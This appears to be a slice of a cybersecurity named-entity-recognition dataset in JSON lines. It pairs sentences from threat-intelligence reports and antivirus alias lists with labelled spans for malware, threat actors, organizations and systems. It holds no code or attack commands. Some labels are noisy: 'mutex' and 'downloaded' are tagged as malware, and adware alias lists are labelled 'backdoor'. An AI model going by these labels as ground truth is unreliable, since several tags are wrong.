{"text": "The ART team at Fortinet has discovered a new malware named Proteus, a multifunctional botnet written in .NET that appears to be a proxy, coin miner, e-commerce merchant account checker, and keylogger.", "spans": {"ORGANIZATION: The ART team": [[0, 12]], "ORGANIZATION: Fortinet": [[16, 24]], "MALWARE: malware": [[46, 53]], "MALWARE: Proteus,": [[60, 68]], "MALWARE: botnet": [[87, 93]], "SYSTEM: .NET": [[105, 109]], "MALWARE: proxy, coin miner, e-commerce merchant account checker,": [[131, 186]], "MALWARE: keylogger.": [[191, 201]]}, "info": {"id": "cyner2_train_006962", "source": "cyner2_train"}}
{"text": "From the Nymaim malware, it leverages the dropper's stealth and persistence; the Gozi ISFB parts add the banking Trojan's capabilities to facilitate fraud via infected Internet browsers.", "spans": {"MALWARE: Nymaim malware,": [[9, 24]], "MALWARE: Gozi ISFB": [[81, 90]], "MALWARE: banking Trojan's": [[105, 121]], "SYSTEM: infected Internet browsers.": [[159, 186]]}, "info": {"id": "cyner2_train_006965", "source": "cyner2_train"}}
{"text": "Backdoor that installs itself at %Application Data%\\remcos", "spans": {"MALWARE: Backdoor": [[0, 8]]}, "info": {"id": "cyner2_train_006967", "source": "cyner2_train"}}
{"text": "Based on strings found in the samples we analyzed, we have named this backdoor Gazer", "spans": {"MALWARE: backdoor": [[70, 78]], "MALWARE: Gazer": [[79, 84]]}, "info": {"id": "cyner2_train_006969", "source": "cyner2_train"}}
{"text": "It spreads via unusual means, including the hijacking of traffic from nationwide ISPs, an SNS worm on Windows, and an offline app installation and community promotion.", "spans": {"MALWARE: SNS worm": [[90, 98]], "SYSTEM: Windows,": [[102, 110]], "SYSTEM: offline app": [[118, 129]]}, "info": {"id": "cyner2_train_006970", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer Win32.Trojan.WisdomEyes.16070401.9500.9986 Trojan.Win32.Dwn.efyiis Trojan.DownLoader22.7328 BehavesLike.Win32.PUPXAA.kc Trojan:MSIL/Watam.A Trojan.MSIL.Spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006972", "source": "cyner2_train"}}
{"text": "The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server.", "spans": {"MALWARE: payload": [[4, 11]], "ORGANIZATION: Korean banks": [[45, 57], [128, 140]], "SYSTEM: infected systems": [[75, 91]]}, "info": {"id": "cyner2_train_006974", "source": "cyner2_train"}}
{"text": "This particular peice of malware uses a open source VB6 peice of malware called vnLoader'.", "spans": {"MALWARE: malware": [[25, 32], [65, 72]], "MALWARE: vnLoader'.": [[80, 90]]}, "info": {"id": "cyner2_train_006975", "source": "cyner2_train"}}
{"text": "This group has been active since 2010. We dub this operation Shrouded Crossbow, after a mutex in a backdoor the group developed.", "spans": {"THREAT_ACTOR: group": [[5, 10], [112, 117]], "THREAT_ACTOR: operation Shrouded Crossbow,": [[51, 79]], "MALWARE: mutex": [[88, 93]], "MALWARE: backdoor": [[99, 107]]}, "info": {"id": "cyner2_train_006976", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.Boxer.as HEUR:Trojan-SMS.AndroidOS.FakeInst.a HEUR:Trojan-SMS.AndroidOS.FakeInst.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006977", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.FC.314 Win32.Trojan.WisdomEyes.16070401.9500.9959 Trojan.Win32.Inject.aexnv Trojan.DownLoader24.51009 TR/AD.NETCryptor.dneew Trojan/Win32.Inject Backdoor:MSIL/Omaneat.B Trojan.MSILPerseus.D17E4F Trojan/Win32.Fsysna.C1935209 Trojan.Win32.Inject.aexnv Trj/GdSda.A Win32.Trojan.Inject.Fsc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006978", "source": "cyner2_train"}}
{"text": "FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems.", "spans": {"ORGANIZATION: FireEye Labs": [[0, 12]], "MALWARE: unknown variant": [[46, 61]], "MALWARE: backdoor XSLCmd – OSX.XSLCmd –": [[73, 103]], "SYSTEM: Apple OS X systems.": [[136, 155]]}, "info": {"id": "cyner2_train_006979", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.Kukel.A Trojan-PWS/W32.Kukel.14116 Trojan.PWS.Kukel.A Trojan/PSW.Kukel Trojan.PWS.Kukel.A Win32.Trojan.WisdomEyes.16070401.9500.9985 TROJ_KUKEL.A Trojan.PWS.Kukel.A Trojan-PSW.Win32.Kukel Trojan.PWS.Kukel.A Trojan.Win32.Kukel.hjwe Trojan.Win32.PSWKukel.14116 Troj.PSW32.W.Kukel!c Trojan.PWS.Kukel.A TrojWare.Win32.PSW.Kukel Trojan.PWS.Kukel.A Trojan.PWS.Kukel Trojan.Kukel.Win32.4 TROJ_KUKEL.A W32/Risk.QXSE-2226 Trojan/PSW.Kukel TR/PSW.Kukel.1 Trojan-PSW.Win32.Kukel TrojanPSW.Kukel Win32/PSW.Kukel Win32.Trojan-qqpass.Qqrob.Wsko Trojan.PWS.Kukel!uom8kUpytHQ W32/Kukel.A!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006981", "source": "cyner2_train"}}
{"text": "This entry is to explain features of Datper, malware used for targeted attacks against Japanese organisations and how to detect it from the logs.", "spans": {"MALWARE: Datper, malware": [[37, 52]], "ORGANIZATION: Japanese organisations": [[87, 109]]}, "info": {"id": "cyner2_train_006982", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tvt Trojan.Korplug.Win32.309 Trojan.Zusy.D41CD9 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Tvt.ll Trojan.KeyLogger.27522 Backdoor:Win32/Sogu.A!dha Trojan.Win32.Tvt.ll Backdoor/Win32.Etso.R17333 Trojan.Win32.Korplug", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006983", "source": "cyner2_train"}}
{"text": "Detected as ANDROIDOS_SLOCKER.OPSCB, this new SLocker mobile ransomware variant features new routines that utilize features of the Chinese social network QQ, along with persistent screen-locking capabilities.", "spans": {"MALWARE: SLocker mobile ransomware variant": [[46, 79]], "ORGANIZATION: the Chinese social network QQ,": [[127, 157]]}, "info": {"id": "cyner2_train_006984", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9984 Trojan-Banker.Win32.Metel.cai Trojan.Win32.Metel.edlvqj Troj.Banker.W32.Metel!c Trojan.Bayanker.42 BehavesLike.Win32.FakeAlertSecurityTool.dc Trojan.Banker.Metel.ys TR/Kryptik.rfzx Trojan:Win32/Exgectow.A Trojan-Banker.Win32.Metel.cai Trojan/Win32.Dorv.R166106 Trj/CI.A Win32/Corkow.AI Win32.Outbreak Win32/Trojan.9df", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006985", "source": "cyner2_train"}}
{"text": "Recent new reporting was released on the DragonOK group which unveiled the many versions of the Sysget backdoor as well as the IsSpace backdoor.", "spans": {"THREAT_ACTOR: the DragonOK group": [[37, 55]], "MALWARE: versions": [[80, 88]], "MALWARE: Sysget backdoor": [[96, 111]], "MALWARE: the IsSpace backdoor.": [[123, 144]]}, "info": {"id": "cyner2_train_006986", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Vehidis Trojan.Win32.Vehidis.wpm Trojan.Win32.Crypted.dodbbd Trojan.Win32.Z.Vehidis.24576.K Troj.W32.Vehidis!c Trojan.Vehidis.Win32.1902 Trojan.Vehidis.hd BDS/Sakkair.ebcng Backdoor:Win32/Sakkair.A Trojan.Win32.Vehidis.wpm Trojan/Win32.Farfli.R115053 Trojan.Vehidis Trj/CI.A Win32.Trojan.Vehidis.Hquw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006987", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9655 Infostealer.Limitail Trojan.Win32.Z.Limitail.303616 Trojan.DownLoader19.57204 BehavesLike.Win32.PUPXAG.dc TR/Dropper.MSIL.lrzyl Trojan.MSILPerseus.D234A0 TrojanSpy:MSIL/Plimrost.B Trojan/Win32.Kryptik.C2400864 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006988", "source": "cyner2_train"}}
{"text": "Standing out because of its prevalence and its sophistication, Stantinko turned out to be quite a puzzle to solve.", "spans": {}, "info": {"id": "cyner2_train_006989", "source": "cyner2_train"}}
{"text": "This utility does several interesting things to evade antivirus detection.", "spans": {}, "info": {"id": "cyner2_train_006990", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Adware.Airpush.55AE Android.Adware.Plankton.A Android.Adware.Plankton.A Android.Trojan.Plankton.k AndroidOS/Plankton.B A.H.Pri.Afoynq.F Trojan.Android.Airpush.djpqsd Adware.MultiAds!1.9D9E Android.Adware.Plankton.A Android.Adware.Plankton Adware.Airpush.3.origin AndroidOS/Plankton.B Android.Adware.Plankton.A Android.Adware.Plankton!c Android-PUP/Airpush.2ac1 Android.Adware.Plankton.A Adware.AndroidOS.AirPush.a AdWare.AndroidOS.Apperhand", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006991", "source": "cyner2_train"}}
{"text": "Successful exploitation seems to be possible on all currently supported versions of MS Office up and including the MS15-022 patch.", "spans": {"VULNERABILITY: exploitation": [[11, 23]], "SYSTEM: MS Office": [[84, 93]]}, "info": {"id": "cyner2_train_006992", "source": "cyner2_train"}}
{"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: Russian-speaking APT actor": [[50, 76]], "MALWARE: Turla": [[100, 105]], "MALWARE: backdoor": [[152, 160]]}, "info": {"id": "cyner2_train_006993", "source": "cyner2_train"}}
{"text": "The malware itself is a fully featured RAT, which uses a compressed, optionally encrypted, raw TCP socket and binary message protocol for command and control communications.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: RAT,": [[39, 43]]}, "info": {"id": "cyner2_train_006997", "source": "cyner2_train"}}
{"text": "This time, however, attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan, which in turn downloaded the PlugX Remote Access Trojan RAT.", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "VULNERABILITY: exploiting": [[108, 118]], "MALWARE: ZeroT Trojan,": [[168, 181]], "MALWARE: downloaded": [[196, 206]], "MALWARE: PlugX Remote Access Trojan RAT.": [[211, 242]]}, "info": {"id": "cyner2_train_006998", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Banker.Win32.89325 Trojan/Spy.Banker.yss Trojan.Win32.Z.Banker.5002130 Trojan.DownLoader13.22038 Trojan/Win32.Scar Win32.Troj.Undef.kcloud PWS:Win32/Mujormel.A TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006999", "source": "cyner2_train"}}
{"text": "Within the last week, the now infamous man-in-the-browser MITB banking malware Dyreza appears to have significantly expanded its target set of entities from which to steal credentials.", "spans": {"MALWARE: man-in-the-browser MITB banking malware Dyreza": [[39, 85]]}, "info": {"id": "cyner2_train_007000", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan2.KJRE Infostealer.Bancos Win.Spyware.Banker-3740 Trojan.Win32.Banker.brismu Troj.Spy.W32.Delf.gmb!c Trojan.PWS.Spy.281 Trojan.Banker.Win32.115104 BehavesLike.Win32.Ramnit.cc W32/Trojan.FKOH-7228 TrojanSpy.Delf.efw W32.InfoStealer.Bancos Win32.Troj.Delf.kcloud Trojan/Win32.Xema.C140526 Trj/CI.A Win32.Trojan.Spy.Edyh TrojanSpy.Delf!R/OQYQsjYN8 Trojan-Spy.Win32.Bancos W32/DelpBanc.A!tr Win32/Trojan.Spy.1ee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007001", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1939 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.S-3 Win.Worm.Taz-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg PE_VIRUX.S-3 Win32/Virut.bt Virus/Win32.Virut.ce Trojan:Win32/VBloader.B Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP Trojan-Banker.Win32.Bancos W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007002", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MiadheardLTM.Trojan Backdoor.Mask.E Trojan/W32.Mask.17920 Trojan.Seedna Trojan.SGH.Win32.1 Troj.W32.SGH.o!c Backdoor.Mask.E W32/Mask.C Backdoor.Weevil.B BKDR_CARETO.A Backdoor.Mask.E Trojan.Win32.SGH.o Backdoor.Mask.E Trojan.Win32.SGH.ctugql Backdoor.Mask.E Backdoor:W32/Mask.A BKDR_CARETO.A Backdoor.Mask W32/Mask.NPPK-3802 Trojan.Win32.a W32.Trojan.Careto TR/Heap.A.4 Trojan/Win32.SGH Trojan:Win32/Seedna.A Trojan.Win32.SGH.o Trojan/Win32.Careto.R97388 Backdoor.Mask Trj/Careto.A Win32/Appetite.C Win32.Trojan.Sgh.Srmy W32/Themas.G!tr Win32/Trojan.aa5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007003", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Ptakks.217 Backdoor.Ptakks.217 Backdoor.Win32.Ptakks!O Trojan.Win32.Ptakks.bdqil Backdoor.Trojan Win32/Ptakks.C BKDR_PTAKKS.B Trojan.Ptakks.216 Backdoor.Win32.Ptakks.217 Backdoor.Ptakks.217 Backdoor.Ptakks.217!9LO95ovp5Xo Backdoor.Win32.Ptakks_217.Svr Backdoor.Ptakks.217 Backdoor.Win32.Ptakks.2_17 Backdoor.Ptakks.217 BackDoor.Ptakks.217 BDS/Ptakks.2 BKDR_PTAKKS.B Backdoor/Ptakks.217 Win32.Hack.Ptakks217.kcloud Backdoor:Win32/Ptakks.2_17 Backdoor.Ptakks.217 W32/Risk.CITI-5061 Trojan/Win32.HDC Backdoor.Ptakks Bck/Ptakks.217 Win32/Ptakks.2_17 PE:Trojan.Ptakks.217!1073777762 Backdoor.Win32.Ptakks W32/Ptakks.217!tr.bdr BackDoor.Ptakks Backdoor.Win32.Ptakks.AY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007005", "source": "cyner2_train"}}
{"text": "It is extremely popular and is currently ranked #10 under Top free Android apps.", "spans": {"SYSTEM: Android apps.": [[67, 80]]}, "info": {"id": "cyner2_train_007006", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod22a.Trojan.8281 TrojanDownloader.Bunabom Trojan.Delf.Win32.72720 Trojan/Delf.qzl TROJ_SPNR.0BKS13 TROJ_SPNR.0BKS13 Troj.Delf.Sjr!c trojandownloader.win32.bunabom.a TR/Delf.sjr.1 TrojanDownloader:Win32/Bunabom.A Trojan.Delf!fsmGjeXPdPQ Trojan-Dropper.Delf Win32/Trojan.4da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007008", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit/W97.CVE-2012-0158 Exp.OLE.CVE-2012-0158.AA Exploit.Ole2.Toolbar!c Win32.Exploit.ShellCode.b Trojan.Mdropper TROJ_CVE20120158.MEVP Win.Trojan.TerminatorRat-2 Exploit.OLE2.Toolbar.a Exploit.ComObj.CVE-2012-0158.hzuf TROJ_CVE20120158.MEVP Trojan.DJPK-4 Exploit.CVE-2012-0158.f MSWord/Toolbar.A!exploit Trojan[Exploit]/MSWord.CVE-2012-0158.di DOC.S.CVE-2012-0158.1106567 Exploit.OLE2.Toolbar.a Exploit.CVE-2012-0158 Exploit.WORD.CVE-2012-0158.A Exploit.CVE-2012-0158 virus.exp.20120158", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007010", "source": "cyner2_train"}}
{"text": "HtpRAT, a newly discovered Remote Access Trojan RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming.", "spans": {"MALWARE: HtpRAT,": [[0, 7]], "MALWARE: Remote Access Trojan RAT": [[27, 51]], "MALWARE: RATs": [[92, 96]]}, "info": {"id": "cyner2_train_007011", "source": "cyner2_train"}}
{"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function – get address of phishing page The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile banking app used by the user .", "spans": {}, "info": {"id": "cyner2_train_007012", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransomware.Weelsof.C5 Trojan/Weelsof.b Trojan.Symmi.D1959 Ransom_Weelsof.R002C0CAD18 Win32.Trojan.Kryptik.tx W32/Trojan2.NUBG Win32/Weelsof.BC Ransom_Weelsof.R002C0CAD18 Trojan.Win32.Weelsof.bbkjex Trojan.Win32.Z.Weelsof.116224 Trojan.Winlock.6870 Trojan.Weelsof.Win32.258 W32/Trojan.ECLA-1171 Trojan/Weelsof.ok TR/Weelsof.wm Trojan/Win32.Weelsof Ransom:Win32/Weelsof.C Trojan/Win32.Weelsof.C408750 Trj/CI.A Trojan.Weelsof.B Win32/Weelsof.B Win32.Trojan.Weelsof.cuoj Trojan.Weelsof!AcPYBHX50TA Win32/Trojan.Ransom.434", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007013", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Protux.61400 Backdoor.Protux Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_PROTUX.SMZKEB-A Win.Trojan.Protux-22 Trojan.Win32.Protux.illnz TrojWare.Win32.TrojanDownloader.JMXQ.~0 BackDoor.Diho.190 Backdoor.Protux.Win32.108 BKDR_PROTUX.SMZKEB-A Backdoor.Win32.Protux Backdoor/Protux.dj Trojan:Win32/Dingu.A Trojan[Backdoor]/Win32.Protux Trojan.Heur.E43D7C Backdoor:Win32/Protux.B!dll Trojan/Win32.Xema.R89528 Backdoor.Protux Trj/Protux.C Win32/Protux.NAF Win32.Backdoor.Protux.Pfsy Backdoor.Protux!S6uzS9ogTK0 W32/Protux.KJ!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007014", "source": "cyner2_train"}}
{"text": "These malicious apps are distributed via SEO-optimized fake websites, with keywords targeting hot scandals and affairs used.", "spans": {"MALWARE: malicious apps": [[6, 20]]}, "info": {"id": "cyner2_train_007015", "source": "cyner2_train"}}
{"text": "Earlier this year, the Andromeda botnet was seen using macro-based malware, which is yet again an old trick.", "spans": {"MALWARE: Andromeda botnet": [[23, 39]], "MALWARE: macro-based malware,": [[55, 75]]}, "info": {"id": "cyner2_train_007016", "source": "cyner2_train"}}
{"text": "First observed as early as 2004, NetTraveler is a Trojan used widely in targeted attacks.", "spans": {"MALWARE: NetTraveler": [[33, 44]], "MALWARE: Trojan": [[50, 56]]}, "info": {"id": "cyner2_train_007017", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.QqpaNHm.Trojan Backdoor.Hupigon.275309 Trojan.Danginex.A2 Backdoor.Hupigon.275309 Backdoor/Hupigon.pgzz Backdoor.Hupigon.D4336D Win32.Trojan.FakeIME.d Win32/Oflwr.A!crypt Backdoor.Hupigon.275309 Trojan.Win32.Hupigon.chvyyc Backdoor.Hupigon.275309 Backdoor.Hupigon.275309 BackDoor.BlackHole.19996 Backdoor.Hupigon.Win32.133590 Backdoor.Win32.Hupigon TR/Orsam.A.7773 Trojan[Backdoor]/Win32.Hupigon Unwanted/Win32.HackTool.R19815 Backdoor.Hupigon Trojan.Offend!DNC2JYmeA/w", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007018", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tinba.19899 W32/Trojan.WNMW-0038 TROJ_MALKRYP.SM7 Trojan.Win32.Androm.dqyyyn Trojan.PWS.Tinba.161 Trojan.Zbot.Win32.178596 TROJ_MALKRYP.SM7 BehavesLike.Win32.PWSZbot.dc Trojan/PSW.Tepfer.ccuq TR/Bunitu.A.194 Trojan.Graftor.D2D2CC TrojanDownloader:Win32/Tonnejoom.A Trojan/Win32.ZBot.R141968 Trojan.ProxyChanger!r8e5ImNFSC4 Trojan.Win32.Injector W32/Injector.BZCD!tr Trojan.ProxyChanger", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007020", "source": "cyner2_train"}}
{"text": "During the month of November, Proofpoint observed multiple campaigns from TA530 - an actor we have previously referred to as the personalized actor for their highly personalized campaigns - targeting customer service and managerial staff at retailers.", "spans": {"ORGANIZATION: Proofpoint": [[30, 40]], "THREAT_ACTOR: campaigns": [[59, 68], [178, 187]], "THREAT_ACTOR: TA530": [[74, 79]], "THREAT_ACTOR: actor": [[85, 90], [142, 147]], "ORGANIZATION: customer service": [[200, 216]], "ORGANIZATION: managerial staff at retailers.": [[221, 251]]}, "info": {"id": "cyner2_train_007022", "source": "cyner2_train"}}
{"text": "EternalRocks is a network worm i.e. self-replicating, emerged in first half of May 2017.", "spans": {"MALWARE: EternalRocks": [[0, 12]], "MALWARE: network worm": [[18, 30]]}, "info": {"id": "cyner2_train_007023", "source": "cyner2_train"}}
{"text": "We'll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.", "spans": {}, "info": {"id": "cyner2_train_007024", "source": "cyner2_train"}}
{"text": "The attack used highly targeted malicious software to destroy the TV network systems.", "spans": {"MALWARE: malicious software": [[32, 50]], "SYSTEM: TV network systems.": [[66, 85]]}, "info": {"id": "cyner2_train_007025", "source": "cyner2_train"}}
{"text": "Proofpoint researchers recently observed a campaign targeting telecom and military in Russia.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: campaign": [[43, 51]], "ORGANIZATION: telecom": [[62, 69]], "ORGANIZATION: military": [[74, 82]]}, "info": {"id": "cyner2_train_007026", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.65536.HV TrojanDownloader.Kolilks.B5 Trojan/Scar.cavw Trojan.Graftor.Elzob.D3707 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/SillyDl.HER TROJ_DLOADE.SMEP Trojan.Win32.Scar.bxwdr Trojan.DownLoad1.2460 TROJ_DLOADE.SMEP W32.Malware.Downloader Trojan/Win32.Scar TrojanDownloader:Win32/Kolilks.B Trojan.Win32.A.Scar.48640.J Trojan/Win32.Scar.R4127 TrojanDownloader.BHO Worm.Win32.Kolios.a Trojan-Downloader.Win32.Kolilks W32/Mdrop.EB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007027", "source": "cyner2_train"}}
{"text": "Stealing FTP credentials and browser cookies", "spans": {}, "info": {"id": "cyner2_train_007028", "source": "cyner2_train"}}
{"text": "In this campaign, a PDF file with an embedded javascript is used to download the payload from a Google Drive shared link.", "spans": {"THREAT_ACTOR: campaign,": [[8, 17]], "MALWARE: the payload": [[77, 88]], "SYSTEM: Google Drive": [[96, 108]]}, "info": {"id": "cyner2_train_007029", "source": "cyner2_train"}}
{"text": "With the new architecture, PluginPhantom achieves more flexibility to update its modules without reinstalling apps.", "spans": {"SYSTEM: architecture,": [[13, 26]], "MALWARE: PluginPhantom": [[27, 40]], "SYSTEM: apps.": [[110, 115]]}, "info": {"id": "cyner2_train_007031", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Pwstool.Netpass Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Riskware.WebBrowserPassView.A Riskware.Win32.PassView.eqrnrb Tool.PassView.1871 BehavesLike.Win32.Dropper.gc PSWTool.NetPass.gh RiskWare[PSWTool]/Win32.NetPass PUP.Optional.PasswordViewer Riskware.PSWTool! Win32/Virus.PSW.a52", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007032", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameERALV.Trojan Trojan/W32.Loader.36932 Trojan.Win32.Loader!O Trojan.Myma.A3 Trojan.Loader.Win32.2 Troj.W32.Loader.c!c Trojan/Loader.c Trojan.Graftor.D51D2 Win32.Trojan.Loader.b Backdoor.Trojan Win32/Loader.B TROJ_LOADER.SMIA Win.Trojan.Starter-291 Trojan.Win32.Loader.c Trojan.Win32.Loader.bwzwn Trojan.Win32.A.Loader.36864 Trojan.Loader.575 TROJ_LOADER.SMIA Trojan/Loader.b Backdoor.Trojan TR/Loader.C Trojan/Win32.Loader Trojan:Win32/Loader.WOD Trojan.Win32.Loader.c Trojan/Win32.Loader.R4213 Trojan.Loader Trj/Loader.B Trojan.Win32.Loader.cc Trojan.Loader!V/30nEGDEMU Trojan.Win32.LOADER W32/LOADER.C!tr Trojan.PSW.Win32.QQPass.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007034", "source": "cyner2_train"}}
{"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. , IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g. , IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database .", "spans": {"SYSTEM: GSM": [[55, 58]], "SYSTEM: WhatsApp": [[61, 69]], "SYSTEM: Telegram": [[72, 80]], "SYSTEM: Facebook": [[83, 91]], "SYSTEM: Threema": [[98, 105]], "SYSTEM: Android": [[330, 337]]}, "info": {"id": "cyner2_train_007036", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_FAM_00005ae.TOMA Win32.Trojan-Downloader.Small.bh W32/Downldr2.GMBK TROJ_FAM_00005ae.TOMA Win.Downloader.77716-1 Trojan.Win32.DownLoad.cvxyj Trojan.DownLoad.50492 Backdoor.CPEX.Win32.14166 W32/Downloader.FCDJ-0388", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007037", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.FraudPack.30252 Trojan.Win32.FraudPack!O TjnDownldr.Ladivyrop.S79502 Win32.Trojan.WisdomEyes.16070401.9500.9993 Trojan.Win32.FraudPack.aie Trojan.Win32.FraudPack.cysfht Trojan.FraudPack.Win32.31030 BehavesLike.Win32.Dropper.mc Trojan-Downloader.Win32.Adload Trojan/FraudPack.anzn Trojan.Kazy.D5D389 Trojan.Win32.FraudPack.aie TrojanDownloader:Win32/Ladivyrop.A Trojan.FraudPack Trojan.FraudPack!cVlSVwD6LBI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007038", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.F2DC Trojan.JS.StartPage!O Win32.Trojan.WisdomEyes.16070401.9500.9691 W32/Meredrop.MBVJ-0788 HV_STARTPAGE_CA223323.TOMC Trojan.JS.StartPage.dv Trojan.JS.StartPage.dv Trojan.Script.Ocyt.cqtcgb Trojan.StartPage.35625 Trojan.Win32.Meredrop BehavesLike.Win32.RansomTescrypt.nc Trojan.JS.IEstart W32/Meredrop.DRO Trojan/JS.te W32.Trojan.Meredrop Win32.Troj.Undef.kcloud Trojan:JS/Ociyota.A Trojan.JS.StartPage.dv Trojan/Win32.StartPage.C53044 Trojan.Win32.Meredrop Trojan.Meredrop!IA1ZWY8Gf9I W32/StartPage.IMA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007039", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.BlackEnergy.Trojan Trojan/W32.Small.27648.MW Trojan.Win32.Jorik.Tedroo!O Trojan.Mauvaise.SL1 Win32.Trojan.BlackEnergy.b Backdoor.Win32.BlackEnergy.d Backdoor.Win32.A.Kbot.27648.B TrojWare.Win32.Rootkit.BlackEnergy.AC Trojan-Downloader.Win32.Phdet Backdoor/Kbot.ara Trojan[Backdoor]/Win32.Kbot TrojanDownloader:Win32/Phdet.E Backdoor.Win32.BlackEnergy.d Backdoor/Win32.Kbot.R47968 Backdoor.BlackEnergy Backdoor.Kbot!JCoulsYcyBQ W32/BlackEnergy.AC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007041", "source": "cyner2_train"}}
